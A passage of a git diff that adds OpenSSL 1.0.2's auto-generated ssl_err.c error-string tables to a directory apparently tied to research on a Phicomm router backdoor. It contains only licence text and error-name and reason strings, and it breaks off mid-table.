zi3K4<iqU^KB%;2UfA!kNdVv-A1i#Y4z<cmd!_QeCr>Vn4An@HxAKWJ#g--u1Z&3eq
Ph^t}Wu%g=2S^vKQv&cX!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err.c
new file mode 100644
index 0000000..ab3aa23
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err.c
@@ -0,0 +1,827 @@
+/* ssl/ssl_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_SSL,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_SSL,0,reason)
+
+static ERR_STRING_DATA SSL_str_functs[] = {
+    {ERR_FUNC(SSL_F_CHECK_SUITEB_CIPHER_LIST), "CHECK_SUITEB_CIPHER_LIST"},
+    {ERR_FUNC(SSL_F_CLIENT_CERTIFICATE), "CLIENT_CERTIFICATE"},
+    {ERR_FUNC(SSL_F_CLIENT_FINISHED), "CLIENT_FINISHED"},
+    {ERR_FUNC(SSL_F_CLIENT_HELLO), "CLIENT_HELLO"},
+    {ERR_FUNC(SSL_F_CLIENT_MASTER_KEY), "CLIENT_MASTER_KEY"},
+    {ERR_FUNC(SSL_F_D2I_SSL_SESSION), "d2i_SSL_SESSION"},
+    {ERR_FUNC(SSL_F_DO_DTLS1_WRITE), "do_dtls1_write"},
+    {ERR_FUNC(SSL_F_DO_SSL3_WRITE), "DO_SSL3_WRITE"},
+    {ERR_FUNC(SSL_F_DTLS1_ACCEPT), "dtls1_accept"},
+    {ERR_FUNC(SSL_F_DTLS1_ADD_CERT_TO_BUF), "DTLS1_ADD_CERT_TO_BUF"},
+    {ERR_FUNC(SSL_F_DTLS1_BUFFER_RECORD), "DTLS1_BUFFER_RECORD"},
+    {ERR_FUNC(SSL_F_DTLS1_CHECK_TIMEOUT_NUM), "dtls1_check_timeout_num"},
+    {ERR_FUNC(SSL_F_DTLS1_CLIENT_HELLO), "dtls1_client_hello"},
+    {ERR_FUNC(SSL_F_DTLS1_CONNECT), "dtls1_connect"},
+    {ERR_FUNC(SSL_F_DTLS1_GET_HELLO_VERIFY), "DTLS1_GET_HELLO_VERIFY"},
+    {ERR_FUNC(SSL_F_DTLS1_GET_MESSAGE), "dtls1_get_message"},
+    {ERR_FUNC(SSL_F_DTLS1_GET_MESSAGE_FRAGMENT),
+     "DTLS1_GET_MESSAGE_FRAGMENT"},
+    {ERR_FUNC(SSL_F_DTLS1_GET_RECORD), "dtls1_get_record"},
+    {ERR_FUNC(SSL_F_DTLS1_HANDLE_TIMEOUT), "dtls1_handle_timeout"},
+    {ERR_FUNC(SSL_F_DTLS1_HEARTBEAT), "dtls1_heartbeat"},
+    {ERR_FUNC(SSL_F_DTLS1_OUTPUT_CERT_CHAIN), "dtls1_output_cert_chain"},
+    {ERR_FUNC(SSL_F_DTLS1_PREPROCESS_FRAGMENT), "DTLS1_PREPROCESS_FRAGMENT"},
+    {ERR_FUNC(SSL_F_DTLS1_PROCESS_OUT_OF_SEQ_MESSAGE),
+     "DTLS1_PROCESS_OUT_OF_SEQ_MESSAGE"},
+    {ERR_FUNC(SSL_F_DTLS1_PROCESS_RECORD), "DTLS1_PROCESS_RECORD"},
+    {ERR_FUNC(SSL_F_DTLS1_READ_BYTES), "dtls1_read_bytes"},
+    {ERR_FUNC(SSL_F_DTLS1_READ_FAILED), "dtls1_read_failed"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_CERTIFICATE_REQUEST),
+     "dtls1_send_certificate_request"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_CLIENT_CERTIFICATE),
+     "dtls1_send_client_certificate"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_CLIENT_KEY_EXCHANGE),
+     "dtls1_send_client_key_exchange"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_CLIENT_VERIFY), "dtls1_send_client_verify"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_HELLO_VERIFY_REQUEST),
+     "DTLS1_SEND_HELLO_VERIFY_REQUEST"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_SERVER_CERTIFICATE),
+     "dtls1_send_server_certificate"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_SERVER_HELLO), "dtls1_send_server_hello"},
+    {ERR_FUNC(SSL_F_DTLS1_SEND_SERVER_KEY_EXCHANGE),
+     "dtls1_send_server_key_exchange"},
+    {ERR_FUNC(SSL_F_DTLS1_WRITE_APP_DATA_BYTES),
+     "dtls1_write_app_data_bytes"},
+    {ERR_FUNC(SSL_F_GET_CLIENT_FINISHED), "GET_CLIENT_FINISHED"},
+    {ERR_FUNC(SSL_F_GET_CLIENT_HELLO), "GET_CLIENT_HELLO"},
+    {ERR_FUNC(SSL_F_GET_CLIENT_MASTER_KEY), "GET_CLIENT_MASTER_KEY"},
+    {ERR_FUNC(SSL_F_GET_SERVER_FINISHED), "GET_SERVER_FINISHED"},
+    {ERR_FUNC(SSL_F_GET_SERVER_HELLO), "GET_SERVER_HELLO"},
+    {ERR_FUNC(SSL_F_GET_SERVER_VERIFY), "GET_SERVER_VERIFY"},
+    {ERR_FUNC(SSL_F_I2D_SSL_SESSION), "i2d_SSL_SESSION"},
+    {ERR_FUNC(SSL_F_READ_N), "READ_N"},
+    {ERR_FUNC(SSL_F_REQUEST_CERTIFICATE), "REQUEST_CERTIFICATE"},
+    {ERR_FUNC(SSL_F_SERVER_FINISH), "SERVER_FINISH"},
+    {ERR_FUNC(SSL_F_SERVER_HELLO), "SERVER_HELLO"},
+    {ERR_FUNC(SSL_F_SERVER_VERIFY), "SERVER_VERIFY"},
+    {ERR_FUNC(SSL_F_SSL23_ACCEPT), "ssl23_accept"},
+    {ERR_FUNC(SSL_F_SSL23_CLIENT_HELLO), "SSL23_CLIENT_HELLO"},
+    {ERR_FUNC(SSL_F_SSL23_CONNECT), "ssl23_connect"},
+    {ERR_FUNC(SSL_F_SSL23_GET_CLIENT_HELLO), "SSL23_GET_CLIENT_HELLO"},
+    {ERR_FUNC(SSL_F_SSL23_GET_SERVER_HELLO), "SSL23_GET_SERVER_HELLO"},
+    {ERR_FUNC(SSL_F_SSL23_PEEK), "ssl23_peek"},
+    {ERR_FUNC(SSL_F_SSL23_READ), "ssl23_read"},
+    {ERR_FUNC(SSL_F_SSL23_WRITE), "ssl23_write"},
+    {ERR_FUNC(SSL_F_SSL2_ACCEPT), "ssl2_accept"},
+    {ERR_FUNC(SSL_F_SSL2_CONNECT), "ssl2_connect"},
+    {ERR_FUNC(SSL_F_SSL2_ENC_INIT), "ssl2_enc_init"},
+    {ERR_FUNC(SSL_F_SSL2_GENERATE_KEY_MATERIAL),
+     "ssl2_generate_key_material"},
+    {ERR_FUNC(SSL_F_SSL2_PEEK), "ssl2_peek"},
+    {ERR_FUNC(SSL_F_SSL2_READ), "ssl2_read"},
+    {ERR_FUNC(SSL_F_SSL2_READ_INTERNAL), "SSL2_READ_INTERNAL"},
+    {ERR_FUNC(SSL_F_SSL2_SET_CERTIFICATE), "ssl2_set_certificate"},
+    {ERR_FUNC(SSL_F_SSL2_WRITE), "ssl2_write"},
+    {ERR_FUNC(SSL_F_SSL3_ACCEPT), "ssl3_accept"},
+    {ERR_FUNC(SSL_F_SSL3_ADD_CERT_TO_BUF), "SSL3_ADD_CERT_TO_BUF"},
+    {ERR_FUNC(SSL_F_SSL3_CALLBACK_CTRL), "ssl3_callback_ctrl"},
+    {ERR_FUNC(SSL_F_SSL3_CHANGE_CIPHER_STATE), "ssl3_change_cipher_state"},
+    {ERR_FUNC(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM),
+     "ssl3_check_cert_and_algorithm"},
+    {ERR_FUNC(SSL_F_SSL3_CHECK_CLIENT_HELLO), "ssl3_check_client_hello"},
+    {ERR_FUNC(SSL_F_SSL3_CLIENT_HELLO), "ssl3_client_hello"},
+    {ERR_FUNC(SSL_F_SSL3_CONNECT), "ssl3_connect"},
+    {ERR_FUNC(SSL_F_SSL3_CTRL), "ssl3_ctrl"},
+    {ERR_FUNC(SSL_F_SSL3_CTX_CTRL), "ssl3_ctx_ctrl"},
+    {ERR_FUNC(SSL_F_SSL3_DIGEST_CACHED_RECORDS),
+     "ssl3_digest_cached_records"},
+    {ERR_FUNC(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC),
+     "ssl3_do_change_cipher_spec"},
+    {ERR_FUNC(SSL_F_SSL3_ENC), "ssl3_enc"},
+    {ERR_FUNC(SSL_F_SSL3_GENERATE_KEY_BLOCK), "SSL3_GENERATE_KEY_BLOCK"},
+    {ERR_FUNC(SSL_F_SSL3_GET_CERTIFICATE_REQUEST),
+     "ssl3_get_certificate_request"},
+    {ERR_FUNC(SSL_F_SSL3_GET_CERT_STATUS), "ssl3_get_cert_status"},
+    {ERR_FUNC(SSL_F_SSL3_GET_CERT_VERIFY), "ssl3_get_cert_verify"},
+    {ERR_FUNC(SSL_F_SSL3_GET_CLIENT_CERTIFICATE),
+     "ssl3_get_client_certificate"},
+    {ERR_FUNC(SSL_F_SSL3_GET_CLIENT_HELLO), "ssl3_get_client_hello"},
+    {ERR_FUNC(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE),
+     "ssl3_get_client_key_exchange"},
+    {ERR_FUNC(SSL_F_SSL3_GET_FINISHED), "ssl3_get_finished"},
+    {ERR_FUNC(SSL_F_SSL3_GET_KEY_EXCHANGE), "ssl3_get_key_exchange"},
+    {ERR_FUNC(SSL_F_SSL3_GET_MESSAGE), "ssl3_get_message"},
+    {ERR_FUNC(SSL_F_SSL3_GET_NEW_SESSION_TICKET),
+     "ssl3_get_new_session_ticket"},
+    {ERR_FUNC(SSL_F_SSL3_GET_NEXT_PROTO), "ssl3_get_next_proto"},
+    {ERR_FUNC(SSL_F_SSL3_GET_RECORD), "SSL3_GET_RECORD"},
+    {ERR_FUNC(SSL_F_SSL3_GET_SERVER_CERTIFICATE),
+     "ssl3_get_server_certificate"},
+    {ERR_FUNC(SSL_F_SSL3_GET_SERVER_DONE), "ssl3_get_server_done"},
+    {ERR_FUNC(SSL_F_SSL3_GET_SERVER_HELLO), "ssl3_get_server_hello"},
+    {ERR_FUNC(SSL_F_SSL3_HANDSHAKE_MAC), "ssl3_handshake_mac"},
+    {ERR_FUNC(SSL_F_SSL3_NEW_SESSION_TICKET), "SSL3_NEW_SESSION_TICKET"},
+    {ERR_FUNC(SSL_F_SSL3_OUTPUT_CERT_CHAIN), "ssl3_output_cert_chain"},
+    {ERR_FUNC(SSL_F_SSL3_PEEK), "ssl3_peek"},
+    {ERR_FUNC(SSL_F_SSL3_READ_BYTES), "ssl3_read_bytes"},
+    {ERR_FUNC(SSL_F_SSL3_READ_N), "ssl3_read_n"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST),
+     "ssl3_send_certificate_request"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE),
+     "ssl3_send_client_certificate"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE),
+     "ssl3_send_client_key_exchange"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_CLIENT_VERIFY), "ssl3_send_client_verify"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_SERVER_CERTIFICATE),
+     "ssl3_send_server_certificate"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_SERVER_HELLO), "ssl3_send_server_hello"},
+    {ERR_FUNC(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE),
+     "ssl3_send_server_key_exchange"},
+    {ERR_FUNC(SSL_F_SSL3_SETUP_KEY_BLOCK), "ssl3_setup_key_block"},
+    {ERR_FUNC(SSL_F_SSL3_SETUP_READ_BUFFER), "ssl3_setup_read_buffer"},
+    {ERR_FUNC(SSL_F_SSL3_SETUP_WRITE_BUFFER), "ssl3_setup_write_buffer"},
+    {ERR_FUNC(SSL_F_SSL3_WRITE_BYTES), "ssl3_write_bytes"},
+    {ERR_FUNC(SSL_F_SSL3_WRITE_PENDING), "ssl3_write_pending"},
+    {ERR_FUNC(SSL_F_SSL_ADD_CERT_CHAIN), "ssl_add_cert_chain"},
+    {ERR_FUNC(SSL_F_SSL_ADD_CERT_TO_BUF), "SSL_ADD_CERT_TO_BUF"},
+    {ERR_FUNC(SSL_F_SSL_ADD_CLIENTHELLO_RENEGOTIATE_EXT),
+     "ssl_add_clienthello_renegotiate_ext"},
+    {ERR_FUNC(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT),
+     "ssl_add_clienthello_tlsext"},
+    {ERR_FUNC(SSL_F_SSL_ADD_CLIENTHELLO_USE_SRTP_EXT),
+     "ssl_add_clienthello_use_srtp_ext"},
+    {ERR_FUNC(SSL_F_SSL_ADD_DIR_CERT_SUBJECTS_TO_STACK),
+     "SSL_add_dir_cert_subjects_to_stack"},
+    {ERR_FUNC(SSL_F_SSL_ADD_FILE_CERT_SUBJECTS_TO_STACK),
+     "SSL_add_file_cert_subjects_to_stack"},
+    {ERR_FUNC(SSL_F_SSL_ADD_SERVERHELLO_RENEGOTIATE_EXT),
+     "ssl_add_serverhello_renegotiate_ext"},
+    {ERR_FUNC(SSL_F_SSL_ADD_SERVERHELLO_TLSEXT),
+     "ssl_add_serverhello_tlsext"},
+    {ERR_FUNC(SSL_F_SSL_ADD_SERVERHELLO_USE_SRTP_EXT),
+     "ssl_add_serverhello_use_srtp_ext"},
+    {ERR_FUNC(SSL_F_SSL_BAD_METHOD), "ssl_bad_method"},
+    {ERR_FUNC(SSL_F_SSL_BUILD_CERT_CHAIN), "ssl_build_cert_chain"},
+    {ERR_FUNC(SSL_F_SSL_BYTES_TO_CIPHER_LIST), "ssl_bytes_to_cipher_list"},
+    {ERR_FUNC(SSL_F_SSL_CERT_DUP), "ssl_cert_dup"},
+    {ERR_FUNC(SSL_F_SSL_CERT_INST), "ssl_cert_inst"},
+    {ERR_FUNC(SSL_F_SSL_CERT_INSTANTIATE), "SSL_CERT_INSTANTIATE"},
+    {ERR_FUNC(SSL_F_SSL_CERT_NEW), "ssl_cert_new"},
+    {ERR_FUNC(SSL_F_SSL_CHECK_PRIVATE_KEY), "SSL_check_private_key"},
+    {ERR_FUNC(SSL_F_SSL_CHECK_SERVERHELLO_TLSEXT),
+     "SSL_CHECK_SERVERHELLO_TLSEXT"},
+    {ERR_FUNC(SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG),
+     "ssl_check_srvr_ecc_cert_and_alg"},
+    {ERR_FUNC(SSL_F_SSL_CIPHER_PROCESS_RULESTR),
+     "SSL_CIPHER_PROCESS_RULESTR"},
+    {ERR_FUNC(SSL_F_SSL_CIPHER_STRENGTH_SORT), "SSL_CIPHER_STRENGTH_SORT"},
+    {ERR_FUNC(SSL_F_SSL_CLEAR), "SSL_clear"},
+    {ERR_FUNC(SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD),
+     "SSL_COMP_add_compression_method"},
+    {ERR_FUNC(SSL_F_SSL_CONF_CMD), "SSL_CONF_cmd"},
+    {ERR_FUNC(SSL_F_SSL_CREATE_CIPHER_LIST), "ssl_create_cipher_list"},
+    {ERR_FUNC(SSL_F_SSL_CTRL), "SSL_ctrl"},
+    {ERR_FUNC(SSL_F_SSL_CTX_CHECK_PRIVATE_KEY), "SSL_CTX_check_private_key"},
+    {ERR_FUNC(SSL_F_SSL_CTX_MAKE_PROFILES), "SSL_CTX_MAKE_PROFILES"},
+    {ERR_FUNC(SSL_F_SSL_CTX_NEW), "SSL_CTX_new"},
+    {ERR_FUNC(SSL_F_SSL_CTX_SET_CIPHER_LIST), "SSL_CTX_set_cipher_list"},
+    {ERR_FUNC(SSL_F_SSL_CTX_SET_CLIENT_CERT_ENGINE),
+     "SSL_CTX_set_client_cert_engine"},
+    {ERR_FUNC(SSL_F_SSL_CTX_SET_PURPOSE), "SSL_CTX_set_purpose"},
+    {ERR_FUNC(SSL_F_SSL_CTX_SET_SESSION_ID_CONTEXT),
+     "SSL_CTX_set_session_id_context"},
+    {ERR_FUNC(SSL_F_SSL_CTX_SET_SSL_VERSION), "SSL_CTX_set_ssl_version"},
+    {ERR_FUNC(SSL_F_SSL_CTX_SET_TRUST), "SSL_CTX_set_trust"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_CERTIFICATE), "SSL_CTX_use_certificate"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_CERTIFICATE_ASN1),
+     "SSL_CTX_use_certificate_ASN1"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE),
+     "SSL_CTX_use_certificate_chain_file"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_CERTIFICATE_FILE),
+     "SSL_CTX_use_certificate_file"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_PRIVATEKEY), "SSL_CTX_use_PrivateKey"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_PRIVATEKEY_ASN1),
+     "SSL_CTX_use_PrivateKey_ASN1"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE),
+     "SSL_CTX_use_PrivateKey_file"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_PSK_IDENTITY_HINT),
+     "SSL_CTX_use_psk_identity_hint"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY), "SSL_CTX_use_RSAPrivateKey"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_ASN1),
+     "SSL_CTX_use_RSAPrivateKey_ASN1"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE),
+     "SSL_CTX_use_RSAPrivateKey_file"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_SERVERINFO), "SSL_CTX_use_serverinfo"},
+    {ERR_FUNC(SSL_F_SSL_CTX_USE_SERVERINFO_FILE),
+     "SSL_CTX_use_serverinfo_file"},
+    {ERR_FUNC(SSL_F_SSL_DO_HANDSHAKE), "SSL_do_handshake"},
+    {ERR_FUNC(SSL_F_SSL_GET_NEW_SESSION), "ssl_get_new_session"},
+    {ERR_FUNC(SSL_F_SSL_GET_PREV_SESSION), "ssl_get_prev_session"},
+    {ERR_FUNC(SSL_F_SSL_GET_SERVER_CERT_INDEX), "SSL_GET_SERVER_CERT_INDEX"},
+    {ERR_FUNC(SSL_F_SSL_GET_SERVER_SEND_CERT), "SSL_GET_SERVER_SEND_CERT"},
+    {ERR_FUNC(SSL_F_SSL_GET_SERVER_SEND_PKEY), "ssl_get_server_send_pkey"},
+    {ERR_FUNC(SSL_F_SSL_GET_SIGN_PKEY), "ssl_get_sign_pkey"},
+    {ERR_FUNC(SSL_F_SSL_INIT_WBIO_BUFFER), "ssl_init_wbio_buffer"},
+    {ERR_FUNC(SSL_F_SSL_LOAD_CLIENT_CA_FILE), "SSL_load_client_CA_file"},
+    {ERR_FUNC(SSL_F_SSL_NEW), "SSL_new"},
+    {ERR_FUNC(SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT),
+     "ssl_parse_clienthello_renegotiate_ext"},
+    {ERR_FUNC(SSL_F_SSL_PARSE_CLIENTHELLO_TLSEXT),
+     "ssl_parse_clienthello_tlsext"},
+    {ERR_FUNC(SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT),
+     "ssl_parse_clienthello_use_srtp_ext"},
+    {ERR_FUNC(SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT),
+     "ssl_parse_serverhello_renegotiate_ext"},
+    {ERR_FUNC(SSL_F_SSL_PARSE_SERVERHELLO_TLSEXT),
+     "ssl_parse_serverhello_tlsext"},
+    {ERR_FUNC(SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT),
+     "ssl_parse_serverhello_use_srtp_ext"},
+    {ERR_FUNC(SSL_F_SSL_PEEK), "SSL_peek"},
+    {ERR_FUNC(SSL_F_SSL_PREPARE_CLIENTHELLO_TLSEXT),
+     "ssl_prepare_clienthello_tlsext"},
+    {ERR_FUNC(SSL_F_SSL_PREPARE_SERVERHELLO_TLSEXT),
+     "ssl_prepare_serverhello_tlsext"},
+    {ERR_FUNC(SSL_F_SSL_READ), "SSL_read"},
+    {ERR_FUNC(SSL_F_SSL_RSA_PRIVATE_DECRYPT), "SSL_RSA_PRIVATE_DECRYPT"},
+    {ERR_FUNC(SSL_F_SSL_RSA_PUBLIC_ENCRYPT), "SSL_RSA_PUBLIC_ENCRYPT"},
+    {ERR_FUNC(SSL_F_SSL_SCAN_CLIENTHELLO_TLSEXT),
+     "SSL_SCAN_CLIENTHELLO_TLSEXT"},
+    {ERR_FUNC(SSL_F_SSL_SCAN_SERVERHELLO_TLSEXT),
+     "SSL_SCAN_SERVERHELLO_TLSEXT"},
+    {ERR_FUNC(SSL_F_SSL_SESSION_NEW), "SSL_SESSION_new"},
+    {ERR_FUNC(SSL_F_SSL_SESSION_PRINT_FP), "SSL_SESSION_print_fp"},
+    {ERR_FUNC(SSL_F_SSL_SESSION_SET1_ID_CONTEXT),
+     "SSL_SESSION_set1_id_context"},
+    {ERR_FUNC(SSL_F_SSL_SESS_CERT_NEW), "ssl_sess_cert_new"},
+    {ERR_FUNC(SSL_F_SSL_SET_CERT), "SSL_SET_CERT"},
+    {ERR_FUNC(SSL_F_SSL_SET_CIPHER_LIST), "SSL_set_cipher_list"},
+    {ERR_FUNC(SSL_F_SSL_SET_FD), "SSL_set_fd"},
+    {ERR_FUNC(SSL_F_SSL_SET_PKEY), "SSL_SET_PKEY"},
+    {ERR_FUNC(SSL_F_SSL_SET_PURPOSE), "SSL_set_purpose"},
+    {ERR_FUNC(SSL_F_SSL_SET_RFD), "SSL_set_rfd"},
+    {ERR_FUNC(SSL_F_SSL_SET_SESSION), "SSL_set_session"},
+    {ERR_FUNC(SSL_F_SSL_SET_SESSION_ID_CONTEXT),
+     "SSL_set_session_id_context"},
+    {ERR_FUNC(SSL_F_SSL_SET_SESSION_TICKET_EXT),
+     "SSL_set_session_ticket_ext"},
+    {ERR_FUNC(SSL_F_SSL_SET_TRUST), "SSL_set_trust"},
+    {ERR_FUNC(SSL_F_SSL_SET_WFD), "SSL_set_wfd"},
+    {ERR_FUNC(SSL_F_SSL_SHUTDOWN), "SSL_shutdown"},
+    {ERR_FUNC(SSL_F_SSL_SRP_CTX_INIT), "SSL_SRP_CTX_init"},
+    {ERR_FUNC(SSL_F_SSL_UNDEFINED_CONST_FUNCTION),
+     "ssl_undefined_const_function"},
+    {ERR_FUNC(SSL_F_SSL_UNDEFINED_FUNCTION), "ssl_undefined_function"},
+    {ERR_FUNC(SSL_F_SSL_UNDEFINED_VOID_FUNCTION),
+     "ssl_undefined_void_function"},
+    {ERR_FUNC(SSL_F_SSL_USE_CERTIFICATE), "SSL_use_certificate"},
+    {ERR_FUNC(SSL_F_SSL_USE_CERTIFICATE_ASN1), "SSL_use_certificate_ASN1"},
+    {ERR_FUNC(SSL_F_SSL_USE_CERTIFICATE_FILE), "SSL_use_certificate_file"},
+    {ERR_FUNC(SSL_F_SSL_USE_PRIVATEKEY), "SSL_use_PrivateKey"},
+    {ERR_FUNC(SSL_F_SSL_USE_PRIVATEKEY_ASN1), "SSL_use_PrivateKey_ASN1"},
+    {ERR_FUNC(SSL_F_SSL_USE_PRIVATEKEY_FILE), "SSL_use_PrivateKey_file"},
+    {ERR_FUNC(SSL_F_SSL_USE_PSK_IDENTITY_HINT), "SSL_use_psk_identity_hint"},
+    {ERR_FUNC(SSL_F_SSL_USE_RSAPRIVATEKEY), "SSL_use_RSAPrivateKey"},
+    {ERR_FUNC(SSL_F_SSL_USE_RSAPRIVATEKEY_ASN1),
+     "SSL_use_RSAPrivateKey_ASN1"},
+    {ERR_FUNC(SSL_F_SSL_USE_RSAPRIVATEKEY_FILE),
+     "SSL_use_RSAPrivateKey_file"},
+    {ERR_FUNC(SSL_F_SSL_VERIFY_CERT_CHAIN), "ssl_verify_cert_chain"},
+    {ERR_FUNC(SSL_F_SSL_WRITE), "SSL_write"},
+    {ERR_FUNC(SSL_F_TLS12_CHECK_PEER_SIGALG), "tls12_check_peer_sigalg"},
+    {ERR_FUNC(SSL_F_TLS1_CERT_VERIFY_MAC), "tls1_cert_verify_mac"},
+    {ERR_FUNC(SSL_F_TLS1_CHANGE_CIPHER_STATE), "tls1_change_cipher_state"},
+    {ERR_FUNC(SSL_F_TLS1_CHECK_SERVERHELLO_TLSEXT),
+     "TLS1_CHECK_SERVERHELLO_TLSEXT"},
+    {ERR_FUNC(SSL_F_TLS1_ENC), "tls1_enc"},
+    {ERR_FUNC(SSL_F_TLS1_EXPORT_KEYING_MATERIAL),
+     "tls1_export_keying_material"},
+    {ERR_FUNC(SSL_F_TLS1_GET_CURVELIST), "TLS1_GET_CURVELIST"},
+    {ERR_FUNC(SSL_F_TLS1_HEARTBEAT), "tls1_heartbeat"},
+    {ERR_FUNC(SSL_F_TLS1_PREPARE_CLIENTHELLO_TLSEXT),
+     "TLS1_PREPARE_CLIENTHELLO_TLSEXT"},
+    {ERR_FUNC(SSL_F_TLS1_PREPARE_SERVERHELLO_TLSEXT),
+     "TLS1_PREPARE_SERVERHELLO_TLSEXT"},
+    {ERR_FUNC(SSL_F_TLS1_PRF), "tls1_prf"},
+    {ERR_FUNC(SSL_F_TLS1_SETUP_KEY_BLOCK), "tls1_setup_key_block"},
+    {ERR_FUNC(SSL_F_TLS1_SET_SERVER_SIGALGS), "tls1_set_server_sigalgs"},
+    {ERR_FUNC(SSL_F_WRITE_PENDING), "WRITE_PENDING"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA SSL_str_reasons[] = {
+    {ERR_REASON(SSL_R_APP_DATA_IN_HANDSHAKE), "app data in handshake"},
+    {ERR_REASON(SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT),
+     "attempt to reuse session in different context"},
+    {ERR_REASON(SSL_R_BAD_ALERT_RECORD), "bad alert record"},
+    {ERR_REASON(SSL_R_BAD_AUTHENTICATION_TYPE), "bad authentication type"},
+    {ERR_REASON(SSL_R_BAD_CHANGE_CIPHER_SPEC), "bad change cipher spec"},
+    {ERR_REASON(SSL_R_BAD_CHECKSUM), "bad checksum"},
+    {ERR_REASON(SSL_R_BAD_DATA), "bad data"},
+    {ERR_REASON(SSL_R_BAD_DATA_RETURNED_BY_CALLBACK),
+     "bad data returned by callback"},
+    {ERR_REASON(SSL_R_BAD_DECOMPRESSION), "bad decompression"},
+    {ERR_REASON(SSL_R_BAD_DH_G_LENGTH), "bad dh g length"},
+    {ERR_REASON(SSL_R_BAD_DH_PUB_KEY_LENGTH), "bad dh pub key length"},
